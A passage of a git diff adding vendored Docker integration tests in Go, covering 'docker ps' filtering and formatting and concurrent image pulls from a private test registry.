+	c.Assert(containerOut, checker.Contains, secondID)
+	c.Assert(containerOut, checker.Not(checker.Contains), thirdID)
+}
+
+func (s *DockerSuite) TestPsListContainersFilterExited(c *check.C) {
+	runSleepingContainer(c, "--name=sleep")
+
+	dockerCmd(c, "run", "--name", "zero1", "busybox", "true")
+	firstZero, err := getIDByName("zero1")
+	c.Assert(err, checker.IsNil)
+
+	dockerCmd(c, "run", "--name", "zero2", "busybox", "true")
+	secondZero, err := getIDByName("zero2")
+	c.Assert(err, checker.IsNil)
+
+	out, _, err := dockerCmdWithError("run", "--name", "nonzero1", "busybox", "false")
+	c.Assert(err, checker.NotNil, check.Commentf("Should fail.", out, err))
+
+	firstNonZero, err := getIDByName("nonzero1")
+	c.Assert(err, checker.IsNil)
+
+	out, _, err = dockerCmdWithError("run", "--name", "nonzero2", "busybox", "false")
+	c.Assert(err, checker.NotNil, check.Commentf("Should fail.", out, err))
+	secondNonZero, err := getIDByName("nonzero2")
+	c.Assert(err, checker.IsNil)
+
+	// filter containers by exited=0
+	out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=exited=0")
+	ids := strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(ids, checker.HasLen, 2, check.Commentf("Should be 2 zero exited containers got %d: %s", len(ids), out))
+	c.Assert(ids[0], checker.Equals, secondZero, check.Commentf("First in list should be %q, got %q", secondZero, ids[0]))
+	c.Assert(ids[1], checker.Equals, firstZero, check.Commentf("Second in list should be %q, got %q", firstZero, ids[1]))
+
+	out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=exited=1")
+	ids = strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(ids, checker.HasLen, 2, check.Commentf("Should be 2 zero exited containers got %d", len(ids)))
+	c.Assert(ids[0], checker.Equals, secondNonZero, check.Commentf("First in list should be %q, got %q", secondNonZero, ids[0]))
+	c.Assert(ids[1], checker.Equals, firstNonZero, check.Commentf("Second in list should be %q, got %q", firstNonZero, ids[1]))
+
+}
+
+func (s *DockerSuite) TestPsRightTagName(c *check.C) {
+	// TODO Investigate further why this fails on Windows to Windows CI
+	testRequires(c, DaemonIsLinux)
+	tag := "asybox:shmatest"
+	dockerCmd(c, "tag", "busybox", tag)
+
+	var id1 string
+	out, _ := runSleepingContainer(c)
+	id1 = strings.TrimSpace(string(out))
+
+	var id2 string
+	out, _ = runSleepingContainerInImage(c, tag)
+	id2 = strings.TrimSpace(string(out))
+
+	var imageID string
+	out = inspectField(c, "busybox", "Id")
+	imageID = strings.TrimSpace(string(out))
+
+	var id3 string
+	out, _ = runSleepingContainerInImage(c, imageID)
+	id3 = strings.TrimSpace(string(out))
+
+	out, _ = dockerCmd(c, "ps", "--no-trunc")
+	lines := strings.Split(strings.TrimSpace(string(out)), "\n")
+	// skip header
+	lines = lines[1:]
+	c.Assert(lines, checker.HasLen, 3, check.Commentf("There should be 3 running container, got %d", len(lines)))
+	for _, line := range lines {
+		f := strings.Fields(line)
+		switch f[0] {
+		case id1:
+			c.Assert(f[1], checker.Equals, "busybox", check.Commentf("Expected %s tag for id %s, got %s", "busybox", id1, f[1]))
+		case id2:
+			c.Assert(f[1], checker.Equals, tag, check.Commentf("Expected %s tag for id %s, got %s", tag, id2, f[1]))
+		case id3:
+			c.Assert(f[1], checker.Equals, imageID, check.Commentf("Expected %s imageID for id %s, got %s", tag, id3, f[1]))
+		default:
+			c.Fatalf("Unexpected id %s, expected %s and %s and %s", f[0], id1, id2, id3)
+		}
+	}
+}
+
+func (s *DockerSuite) TestPsLinkedWithNoTrunc(c *check.C) {
+	// Problematic on Windows as it doesn't support links as of Jan 2016
+	testRequires(c, DaemonIsLinux)
+	runSleepingContainer(c, "--name=first")
+	runSleepingContainer(c, "--name=second", "--link=first:first")
+
+	out, _ := dockerCmd(c, "ps", "--no-trunc")
+	lines := strings.Split(strings.TrimSpace(string(out)), "\n")
+	// strip header
+	lines = lines[1:]
+	expected := []string{"second", "first,second/first"}
+	var names []string
+	for _, l := range lines {
+		fields := strings.Fields(l)
+		names = append(names, fields[len(fields)-1])
+	}
+	c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array: %v, got: %v", expected, names))
+}
+
+func (s *DockerSuite) TestPsGroupPortRange(c *check.C) {
+	// Problematic on Windows as it doesn't support port ranges as of Jan 2016
+	testRequires(c, DaemonIsLinux)
+	portRange := "3850-3900"
+	dockerCmd(c, "run", "-d", "--name", "porttest", "-p", portRange+":"+portRange, "busybox", "top")
+
+	out, _ := dockerCmd(c, "ps")
+
+	c.Assert(string(out), checker.Contains, portRange, check.Commentf("docker ps output should have had the port range %q: %s", portRange, string(out)))
+
+}
+
+func (s *DockerSuite) TestPsWithSize(c *check.C) {
+	// Problematic on Windows as it doesn't report the size correctly @swernli
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "run", "-d", "--name", "sizetest", "busybox", "top")
+
+	out, _ := dockerCmd(c, "ps", "--size")
+	c.Assert(out, checker.Contains, "virtual", check.Commentf("docker ps with --size should show virtual size of container"))
+}
+
+func (s *DockerSuite) TestPsListContainersFilterCreated(c *check.C) {
+	// create a container
+	out, _ := dockerCmd(c, "create", "busybox")
+	cID := strings.TrimSpace(out)
+	shortCID := cID[:12]
+
+	// Make sure it DOESN'T show up w/o a '-a' for normal 'ps'
+	out, _ = dockerCmd(c, "ps", "-q")
+	c.Assert(out, checker.Not(checker.Contains), shortCID, check.Commentf("Should have not seen '%s' in ps output:\n%s", shortCID, out))
+
+	// Make sure it DOES show up as 'Created' for 'ps -a'
+	out, _ = dockerCmd(c, "ps", "-a")
+
+	hits := 0
+	for _, line := range strings.Split(out, "\n") {
+		if !strings.Contains(line, shortCID) {
+			continue
+		}
+		hits++
+		c.Assert(line, checker.Contains, "Created", check.Commentf("Missing 'Created' on '%s'", line))
+	}
+
+	c.Assert(hits, checker.Equals, 1, check.Commentf("Should have seen '%s' in ps -a output once:%d\n%s", shortCID, hits, out))
+
+	// filter containers by 'create' - note, no -a needed
+	out, _ = dockerCmd(c, "ps", "-q", "-f", "status=created")
+	containerOut := strings.TrimSpace(out)
+	c.Assert(cID, checker.HasPrefix, containerOut)
+}
+
+func (s *DockerSuite) TestPsFormatMultiNames(c *check.C) {
+	// Problematic on Windows as it doesn't support link as of Jan 2016
+	testRequires(c, DaemonIsLinux)
+	//create 2 containers and link them
+	dockerCmd(c, "run", "--name=child", "-d", "busybox", "top")
+	dockerCmd(c, "run", "--name=parent", "--link=child:linkedone", "-d", "busybox", "top")
+
+	//use the new format capabilities to only list the names and --no-trunc to get all names
+	out, _ := dockerCmd(c, "ps", "--format", "{{.Names}}", "--no-trunc")
+	lines := strings.Split(strings.TrimSpace(string(out)), "\n")
+	expected := []string{"parent", "child,parent/linkedone"}
+	var names []string
+	names = append(names, lines...)
+	c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with non-truncated names: %v, got: %v", expected, names))
+
+	//now list without turning off truncation and make sure we only get the non-link names
+	out, _ = dockerCmd(c, "ps", "--format", "{{.Names}}")
+	lines = strings.Split(strings.TrimSpace(string(out)), "\n")
+	expected = []string{"parent", "child"}
+	var truncNames []string
+	truncNames = append(truncNames, lines...)
+	c.Assert(expected, checker.DeepEquals, truncNames, check.Commentf("Expected array with truncated names: %v, got: %v", expected, truncNames))
+}
+
+// Test for GitHub issue #21772
+func (s *DockerSuite) TestPsNamesMultipleTime(c *check.C) {
+	runSleepingContainer(c, "--name=test1")
+	runSleepingContainer(c, "--name=test2")
+
+	//use the new format capabilities to list the names twice
+	out, _ := dockerCmd(c, "ps", "--format", "{{.Names}} {{.Names}}")
+	lines := strings.Split(strings.TrimSpace(string(out)), "\n")
+	expected := []string{"test2 test2", "test1 test1"}
+	var names []string
+	names = append(names, lines...)
+	c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with names displayed twice: %v, got: %v", expected, names))
+}
+
+func (s *DockerSuite) TestPsFormatHeaders(c *check.C) {
+	// make sure no-container "docker ps" still prints the header row
+	out, _ := dockerCmd(c, "ps", "--format", "table {{.ID}}")
+	c.Assert(out, checker.Equals, "CONTAINER ID\n", check.Commentf(`Expected 'CONTAINER ID\n', got %v`, out))
+
+	// verify that "docker ps" with a container still prints the header row also
+	runSleepingContainer(c, "--name=test")
+	out, _ = dockerCmd(c, "ps", "--format", "table {{.Names}}")
+	c.Assert(out, checker.Equals, "NAMES\ntest\n", check.Commentf(`Expected 'NAMES\ntest\n', got %v`, out))
+}
+
+func (s *DockerSuite) TestPsDefaultFormatAndQuiet(c *check.C) {
+	config := `{
+		"psFormat": "default {{ .ID }}"
+}`
+	d, err := ioutil.TempDir("", "integration-cli-")
+	c.Assert(err, checker.IsNil)
+	defer os.RemoveAll(d)
+
+	err = ioutil.WriteFile(filepath.Join(d, "config.json"), []byte(config), 0644)
+	c.Assert(err, checker.IsNil)
+
+	out, _ := runSleepingContainer(c, "--name=test")
+	id := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "--config", d, "ps", "-q")
+	c.Assert(id, checker.HasPrefix, strings.TrimSpace(out), check.Commentf("Expected to print only the container id, got %v\n", out))
+}
+
+// Test for GitHub issue #12595
+func (s *DockerSuite) TestPsImageIDAfterUpdate(c *check.C) {
+	// TODO: Investigate why this fails on Windows to Windows CI further.
+	testRequires(c, DaemonIsLinux)
+	originalImageName := "busybox:TestPsImageIDAfterUpdate-original"
+	updatedImageName := "busybox:TestPsImageIDAfterUpdate-updated"
+
+	runCmd := exec.Command(dockerBinary, "tag", "busybox:latest", originalImageName)
+	out, _, err := runCommandWithOutput(runCmd)
+	c.Assert(err, checker.IsNil)
+
+	originalImageID, err := getIDByName(originalImageName)
+	c.Assert(err, checker.IsNil)
+
+	runCmd = exec.Command(dockerBinary, append([]string{"run", "-d", originalImageName}, sleepCommandForDaemonPlatform()...)...)
+	out, _, err = runCommandWithOutput(runCmd)
+	c.Assert(err, checker.IsNil)
+	containerID := strings.TrimSpace(out)
+
+	linesOut, err := exec.Command(dockerBinary, "ps", "--no-trunc").CombinedOutput()
+	c.Assert(err, checker.IsNil)
+
+	lines := strings.Split(strings.TrimSpace(string(linesOut)), "\n")
+	// skip header
+	lines = lines[1:]
+	c.Assert(len(lines), checker.Equals, 1)
+
+	for _, line := range lines {
+		f := strings.Fields(line)
+		c.Assert(f[1], checker.Equals, originalImageName)
+	}
+
+	runCmd = exec.Command(dockerBinary, "commit", containerID, updatedImageName)
+	out, _, err = runCommandWithOutput(runCmd)
+	c.Assert(err, checker.IsNil)
+
+	runCmd = exec.Command(dockerBinary, "tag", updatedImageName, originalImageName)
+	out, _, err = runCommandWithOutput(runCmd)
+	c.Assert(err, checker.IsNil)
+
+	linesOut, err = exec.Command(dockerBinary, "ps", "--no-trunc").CombinedOutput()
+	c.Assert(err, checker.IsNil)
+
+	lines = strings.Split(strings.TrimSpace(string(linesOut)), "\n")
+	// skip header
+	lines = lines[1:]
+	c.Assert(len(lines), checker.Equals, 1)
+
+	for _, line := range lines {
+		f := strings.Fields(line)
+		c.Assert(f[1], checker.Equals, originalImageID)
+	}
+
+}
+
+func (s *DockerSuite) TestPsNotShowPortsOfStoppedContainer(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "run", "--name=foo", "-d", "-p", "5000:5000", "busybox", "top")
+	c.Assert(waitRun("foo"), checker.IsNil)
+	out, _ := dockerCmd(c, "ps")
+	lines := strings.Split(strings.TrimSpace(string(out)), "\n")
+	expected := "0.0.0.0:5000->5000/tcp"
+	fields := strings.Fields(lines[1])
+	c.Assert(fields[len(fields)-2], checker.Equals, expected, check.Commentf("Expected: %v, got: %v", expected, fields[len(fields)-2]))
+
+	dockerCmd(c, "kill", "foo")
+	dockerCmd(c, "wait", "foo")
+	out, _ = dockerCmd(c, "ps", "-l")
+	lines = strings.Split(strings.TrimSpace(string(out)), "\n")
+	fields = strings.Fields(lines[1])
+	c.Assert(fields[len(fields)-2], checker.Not(checker.Equals), expected, check.Commentf("Should not got %v", expected))
+}
+
+func (s *DockerSuite) TestPsShowMounts(c *check.C) {
+	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
+
+	mp := prefix + slash + "test"
+
+	dockerCmd(c, "volume", "create", "ps-volume-test")
+	// volume mount containers
+	runSleepingContainer(c, "--name=volume-test-1", "--volume", "ps-volume-test:"+mp)
+	c.Assert(waitRun("volume-test-1"), checker.IsNil)
+	runSleepingContainer(c, "--name=volume-test-2", "--volume", mp)
+	c.Assert(waitRun("volume-test-2"), checker.IsNil)
+	// bind mount container
+	var bindMountSource string
+	var bindMountDestination string
+	if DaemonIsWindows.Condition() {
+		bindMountSource = "c:\\"
+		bindMountDestination = "c:\\t"
+	} else {
+		bindMountSource = "/tmp"
+		bindMountDestination = "/t"
+	}
+	runSleepingContainer(c, "--name=bind-mount-test", "-v", bindMountSource+":"+bindMountDestination)
+	c.Assert(waitRun("bind-mount-test"), checker.IsNil)
+
+	out, _ := dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}")
+
+	lines := strings.Split(strings.TrimSpace(string(out)), "\n")
+	c.Assert(lines, checker.HasLen, 3)
+
+	fields := strings.Fields(lines[0])
+	c.Assert(fields, checker.HasLen, 2)
+	c.Assert(fields[0], checker.Equals, "bind-mount-test")
+	c.Assert(fields[1], checker.Equals, bindMountSource)
+
+	fields = strings.Fields(lines[1])
+	c.Assert(fields, checker.HasLen, 2)
+
+	annonymounsVolumeID := fields[1]
+
+	fields = strings.Fields(lines[2])
+	c.Assert(fields[1], checker.Equals, "ps-volume-test")
+
+	// filter by volume name
+	out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume=ps-volume-test")
+
+	lines = strings.Split(strings.TrimSpace(string(out)), "\n")
+	c.Assert(lines, checker.HasLen, 1)
+
+	fields = strings.Fields(lines[0])
+	c.Assert(fields[1], checker.Equals, "ps-volume-test")
+
+	// empty results filtering by unknown volume
+	out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume=this-volume-should-not-exist")
+	c.Assert(strings.TrimSpace(string(out)), checker.HasLen, 0)
+
+	// filter by mount destination
+	out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume="+mp)
+
+	lines = strings.Split(strings.TrimSpace(string(out)), "\n")
+	c.Assert(lines, checker.HasLen, 2)
+
+	fields = strings.Fields(lines[0])
+	c.Assert(fields[1], checker.Equals, annonymounsVolumeID)
+	fields = strings.Fields(lines[1])
+	c.Assert(fields[1], checker.Equals, "ps-volume-test")
+
+	// filter by bind mount source
+	out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume="+bindMountSource)
+
+	lines = strings.Split(strings.TrimSpace(string(out)), "\n")
+	c.Assert(lines, checker.HasLen, 1)
+
+	fields = strings.Fields(lines[0])
+	c.Assert(fields, checker.HasLen, 2)
+	c.Assert(fields[0], checker.Equals, "bind-mount-test")
+	c.Assert(fields[1], checker.Equals, bindMountSource)
+
+	// filter by bind mount destination
+	out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume="+bindMountDestination)
+
+	lines = strings.Split(strings.TrimSpace(string(out)), "\n")
+	c.Assert(lines, checker.HasLen, 1)
+
+	fields = strings.Fields(lines[0])
+	c.Assert(fields, checker.HasLen, 2)
+	c.Assert(fields[0], checker.Equals, "bind-mount-test")
+	c.Assert(fields[1], checker.Equals, bindMountSource)
+
+	// empty results filtering by unknown mount point
+	out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume="+prefix+slash+"this-path-was-never-mounted")
+	c.Assert(strings.TrimSpace(string(out)), checker.HasLen, 0)
+}
+
+func (s *DockerSuite) TestPsFormatSize(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	runSleepingContainer(c)
+
+	out, _ := dockerCmd(c, "ps", "--format", "table {{.Size}}")
+	lines := strings.Split(out, "\n")
+	c.Assert(lines[1], checker.Not(checker.Equals), "0 B", check.Commentf("Should not display a size of 0 B"))
+
+	out, _ = dockerCmd(c, "ps", "--size", "--format", "table {{.Size}}")
+	lines = strings.Split(out, "\n")
+	c.Assert(lines[0], checker.Equals, "SIZE", check.Commentf("Should only have one size column"))
+
+	out, _ = dockerCmd(c, "ps", "--size", "--format", "raw")
+	lines = strings.Split(out, "\n")
+	c.Assert(lines[8], checker.HasPrefix, "size:", check.Commentf("Size should be appended on a newline"))
+}
+
+func (s *DockerSuite) TestPsListContainersFilterNetwork(c *check.C) {
+	// TODO default network on Windows is not called "bridge", and creating a
+	// custom network fails on Windows fails with "Error response from daemon: plugin not found")
+	testRequires(c, DaemonIsLinux)
+
+	// create some containers
+	runSleepingContainer(c, "--net=bridge", "--name=onbridgenetwork")
+	runSleepingContainer(c, "--net=none", "--name=onnonenetwork")
+
+	// Filter docker ps on non existing network
+	out, _ := dockerCmd(c, "ps", "--filter", "network=doesnotexist")
+	containerOut := strings.TrimSpace(string(out))
+	lines := strings.Split(containerOut, "\n")
+
+	// skip header
+	lines = lines[1:]
+
+	// ps output should have no containers
+	c.Assert(lines, checker.HasLen, 0)
+
+	// Filter docker ps on network bridge
+	out, _ = dockerCmd(c, "ps", "--filter", "network=bridge")
+	containerOut = strings.TrimSpace(string(out))
+
+	lines = strings.Split(containerOut, "\n")
+
+	// skip header
+	lines = lines[1:]
+
+	// ps output should have only one container
+	c.Assert(lines, checker.HasLen, 1)
+
+	// Making sure onbridgenetwork is on the output
+	c.Assert(containerOut, checker.Contains, "onbridgenetwork", check.Commentf("Missing the container on network\n"))
+
+	// Filter docker ps on networks bridge and none
+	out, _ = dockerCmd(c, "ps", "--filter", "network=bridge", "--filter", "network=none")
+	containerOut = strings.TrimSpace(string(out))
+
+	lines = strings.Split(containerOut, "\n")
+
+	// skip header
+	lines = lines[1:]
+
+	//ps output should have both the containers
+	c.Assert(lines, checker.HasLen, 2)
+
+	// Making sure onbridgenetwork and onnonenetwork is on the output
+	c.Assert(containerOut, checker.Contains, "onnonenetwork", check.Commentf("Missing the container on none network\n"))
+	c.Assert(containerOut, checker.Contains, "onbridgenetwork", check.Commentf("Missing the container on bridge network\n"))
+
+	nwID, _ := dockerCmd(c, "network", "inspect", "--format", "{{.ID}}", "bridge")
+
+	// Filter by network ID
+	out, _ = dockerCmd(c, "ps", "--filter", "network="+nwID)
+	containerOut = strings.TrimSpace(string(out))
+
+	c.Assert(containerOut, checker.Contains, "onbridgenetwork")
+}
+
+func (s *DockerSuite) TestPsByOrder(c *check.C) {
+	name1 := "xyz-abc"
+	out, err := runSleepingContainer(c, "--name", name1)
+	c.Assert(err, checker.NotNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+	container1 := strings.TrimSpace(out)
+
+	name2 := "xyz-123"
+	out, err = runSleepingContainer(c, "--name", name2)
+	c.Assert(err, checker.NotNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+	container2 := strings.TrimSpace(out)
+
+	name3 := "789-abc"
+	out, err = runSleepingContainer(c, "--name", name3)
+	c.Assert(err, checker.NotNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+	name4 := "789-123"
+	out, err = runSleepingContainer(c, "--name", name4)
+	c.Assert(err, checker.NotNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+	// Run multiple time should have the same result
+	out, err = dockerCmd(c, "ps", "--no-trunc", "-q", "-f", "name=xyz")
+	c.Assert(err, checker.NotNil)
+	c.Assert(strings.TrimSpace(out), checker.Equals, fmt.Sprintf("%s\n%s", container2, container1))
+
+	// Run multiple time should have the same result
+	out, err = dockerCmd(c, "ps", "--no-trunc", "-q", "-f", "name=xyz")
+	c.Assert(err, checker.NotNil)
+	c.Assert(strings.TrimSpace(out), checker.Equals, fmt.Sprintf("%s\n%s", container2, container1))
+}
+
+func (s *DockerSuite) TestPsFilterMissingArgErrorCode(c *check.C) {
+	_, errCode, _ := dockerCmdWithError("ps", "--filter")
+	c.Assert(errCode, checker.Equals, 125)
+}
+
+// Test case for 30291
+func (s *DockerSuite) TestPsFormatTemplateWithArg(c *check.C) {
+	runSleepingContainer(c, "-d", "--name", "top", "--label", "some.label=label.foo-bar")
+	out, _ := dockerCmd(c, "ps", "--format", `{{.Names}} {{.Label "some.label"}}`)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "top label.foo-bar")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_local_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_local_test.go
new file mode 100644
index 0000000000..cb14c2c702
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_local_test.go
@@ -0,0 +1,492 @@
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"runtime"
+	"strings"
+
+	"github.com/docker/distribution"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/distribution/manifest"
+	"github.com/docker/distribution/manifest/manifestlist"
+	"github.com/docker/distribution/manifest/schema2"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+// testPullImageWithAliases pulls a specific image tag and verifies that any aliases (i.e., other
+// tags for the same image) are not also pulled down.
+//
+// Ref: docker/docker#8141
+func testPullImageWithAliases(c *check.C) {
+	repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL)
+
+	repos := []string{}
+	for _, tag := range []string{"recent", "fresh"} {
+		repos = append(repos, fmt.Sprintf("%v:%v", repoName, tag))
+	}
+
+	// Tag and push the same image multiple times.
+	for _, repo := range repos {
+		dockerCmd(c, "tag", "busybox", repo)
+		dockerCmd(c, "push", repo)
+	}
+
+	// Clear local images store.
+	args := append([]string{"rmi"}, repos...)
+	dockerCmd(c, args...)
+
+	// Pull a single tag and verify it doesn't bring down all aliases.
+	dockerCmd(c, "pull", repos[0])
+	dockerCmd(c, "inspect", repos[0])
+	for _, repo := range repos[1:] {
+		_, _, err := dockerCmdWithError("inspect", repo)
+		c.Assert(err, checker.NotNil, check.Commentf("Image %v shouldn't have been pulled down", repo))
+	}
+}
+
+func (s *DockerRegistrySuite) TestPullImageWithAliases(c *check.C) {
+	testPullImageWithAliases(c)
+}
+
+func (s *DockerSchema1RegistrySuite) TestPullImageWithAliases(c *check.C) {
+	testPullImageWithAliases(c)
+}
+
+// testConcurrentPullWholeRepo pulls the same repo concurrently.
+func testConcurrentPullWholeRepo(c *check.C) {
+	repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL)
+
+	repos := []string{}
+	for _, tag := range []string{"recent", "fresh", "todays"} {
+		repo := fmt.Sprintf("%v:%v", repoName, tag)
+		_, err := buildImage(repo, fmt.Sprintf(`
+		    FROM busybox
+		    ENTRYPOINT ["/bin/echo"]
+		    ENV FOO foo
+		    ENV BAR bar
+		    CMD echo %s
+		`, repo), true)
+		c.Assert(err, checker.IsNil)
+		dockerCmd(c, "push", repo)
+		repos = append(repos, repo)
+	}
+
+	// Clear local images store.
+	args := append([]string{"rmi"}, repos...)
+	dockerCmd(c, args...)
+
+	// Run multiple re-pulls concurrently
+	results := make(chan error)
+	numPulls := 3
+
+	for i := 0; i != numPulls; i++ {
+		go func() {
+			_, _, err := runCommandWithOutput(exec.Command(dockerBinary, "pull", "-a", repoName))
+			results <- err
+		}()
+	}
+
+	// These checks are separate from the loop above because the check
+	// package is not goroutine-safe.
+	for i := 0; i != numPulls; i++ {
+		err := <-results
+		c.Assert(err, checker.IsNil, check.Commentf("concurrent pull failed with error: %v", err))
+	}
+
+	// Ensure all tags were pulled successfully
+	for _, repo := range repos {
+		dockerCmd(c, "inspect", repo)
+		out, _ := dockerCmd(c, "run", "--rm", repo)
+		c.Assert(strings.TrimSpace(out), checker.Equals, "/bin/sh -c echo "+repo)
+	}
+}
+
+func (s *DockerRegistrySuite) testConcurrentPullWholeRepo(c *check.C) {
+	testConcurrentPullWholeRepo(c)
+}
+
+func (s *DockerSchema1RegistrySuite) testConcurrentPullWholeRepo(c *check.C) {
+	testConcurrentPullWholeRepo(c)
+}
+
+// testConcurrentFailingPull tries a concurrent pull that doesn't succeed.
+func testConcurrentFailingPull(c *check.C) {
+	repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL)
+
+	// Run multiple pulls concurrently
+	results := make(chan error)
+	numPulls := 3
+
+	for i := 0; i != numPulls; i++ {
+		go func() {
+			_, _, err := runCommandWithOutput(exec.Command(dockerBinary, "pull", repoName+":asdfasdf"))
+			results <- err
+		}()
+	}
+
+	// These checks are separate from the loop above because the check
+	// package is not goroutine-safe.
+	for i := 0; i != numPulls; i++ {
+		err := <-results
+		c.Assert(err, checker.NotNil, check.Commentf("expected pull to fail"))
+	}
+}
+
+func (s *DockerRegistrySuite) testConcurrentFailingPull(c *check.C) {
+	testConcurrentFailingPull(c)
+}
+
+func (s *DockerSchema1RegistrySuite) testConcurrentFailingPull(c *check.C) {
+	testConcurrentFailingPull(c)
+}
+
+// testConcurrentPullMultipleTags pulls multiple tags from the same repo
+// concurrently.
+func testConcurrentPullMultipleTags(c *check.C) {
+	repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL)
+
+	repos := []string{}
+	for _, tag := range []string{"recent", "fresh", "todays"} {
+		repo := fmt.Sprintf("%v:%v", repoName, tag)
+		_, err := buildImage(repo, fmt.Sprintf(`
+		    FROM busybox
+		    ENTRYPOINT ["/bin/echo"]
+		    ENV FOO foo
+		    ENV BAR bar
+		    CMD echo %s
+		`, repo), true)
+		c.Assert(err, checker.IsNil)
+		dockerCmd(c, "push", repo)
+		repos = append(repos, repo)
+	}
+
+	// Clear local images store.
+	args := append([]string{"rmi"}, repos...)
+	dockerCmd(c, args...)
+
+	// Re-pull individual tags, in parallel
+	results := make(chan error)
+
+	for _, repo := range repos {
+		go func(repo string) {
+			_, _, err := runCommandWithOutput(exec.Command(dockerBinary, "pull", repo))
+			results <- err
+		}(repo)
+	}
+
+	// These checks are separate from the loop above because the check
+	// package is not goroutine-safe.
+	for range repos {
+		err := <-results
+		c.Assert(err, checker.IsNil, check.Commentf("concurrent pull failed with error: %v", err))
+	}
+
+	// Ensure all tags were pulled successfully
+	for _, repo := range repos {
+		dockerCmd(c, "inspect", repo)
+		out, _ := dockerCmd(c, "run", "--rm", repo)
+		c.Assert(strings.TrimSpace(out), checker.Equals, "/bin/sh -c echo "+repo)
+	}
+}
+
+func (s *DockerRegistrySuite) TestConcurrentPullMultipleTags(c *check.C) {
+	testConcurrentPullMultipleTags(c)
+}
+
+func (s *DockerSchema1RegistrySuite) TestConcurrentPullMultipleTags(c *check.C) {
+	testConcurrentPullMultipleTags(c)
+}
+
+// testPullIDStability verifies that pushing an image and pulling it back
+// preserves the image ID.
+func testPullIDStability(c *check.C) {
+	derivedImage := privateRegistryURL + "/dockercli/id-stability"
+	baseImage := "busybox"
+
+	_, err := buildImage(derivedImage, fmt.Sprintf(`
+	    FROM %s
+	    ENV derived true
+	    ENV asdf true
+	    RUN dd if=/dev/zero of=/file bs=1024 count=1024
+	    CMD echo %s
+	`, baseImage, derivedImage), true)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	originalID, err := getIDByName(derivedImage)
+	if err != nil {
+		c.Fatalf("error inspecting: %v", err)
+	}
+	dockerCmd(c, "push", derivedImage)
+
+	// Pull
+	out, _ := dockerCmd(c, "pull", derivedImage)
+	if strings.Contains(out, "Pull complete") {
+		c.Fatalf("repull redownloaded a layer: %s", out)
+	}
+
+	derivedIDAfterPull, err := getIDByName(derivedImage)
+	if err != nil {
+		c.Fatalf("error inspecting: %v", err)
+	}
+
+	if derivedIDAfterPull != originalID {
+		c.Fatal("image's ID unexpectedly changed after a repush/repull")
+	}
+
+	// Make sure the image runs correctly
+	out, _ = dockerCmd(c, "run", "--rm", derivedImage)
+	if strings.TrimSpace(out) != derivedImage {
+		c.Fatalf("expected %s; got %s", derivedImage, out)
+	}
+
+	// Confirm that repushing and repulling does not change the computed ID
+	dockerCmd(c, "push", derivedImage)
+	dockerCmd(c, "rmi", derivedImage)
+	dockerCmd(c, "pull", derivedImage)
+
+	derivedIDAfterPull, err = getIDByName(derivedImage)
+	if err != nil {
+		c.Fatalf("error inspecting: %v", err)
+	}
+
+	if derivedIDAfterPull != originalID {
+		c.Fatal("image's ID unexpectedly changed after a repush/repull")
+	}
+	if err != nil {
+		c.Fatalf("error inspecting: %v", err)
+	}
+
+	// Make sure the image still runs
+	out, _ = dockerCmd(c, "run", "--rm", derivedImage)
+	if strings.TrimSpace(out) != derivedImage {
+		c.Fatalf("expected %s; got %s", derivedImage, out)
+	}
+}
+
+func (s *DockerRegistrySuite) TestPullIDStability(c *check.C) {
+	testPullIDStability(c)
+}
+
+func (s *DockerSchema1RegistrySuite) TestPullIDStability(c *check.C) {
+	testPullIDStability(c)
+}
+
+// #21213
+func testPullNoLayers(c *check.C) {
+	repoName := fmt.Sprintf("%v/dockercli/scratch", privateRegistryURL)
+
+	_, err := buildImage(repoName, `
+	FROM scratch
+	ENV foo bar`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	dockerCmd(c, "push", repoName)
+	dockerCmd(c, "rmi", repoName)
+	dockerCmd(c, "pull", repoName)
+}
+
+func (s *DockerRegistrySuite) TestPullNoLayers(c *check.C) {
+	testPullNoLayers(c)
+}
+
+func (s *DockerSchema1RegistrySuite) TestPullNoLayers(c *check.C) {
+	testPullNoLayers(c)
+}
+
+func (s *DockerRegistrySuite) TestPullManifestList(c *check.C) {
+	testRequires(c, NotArm)
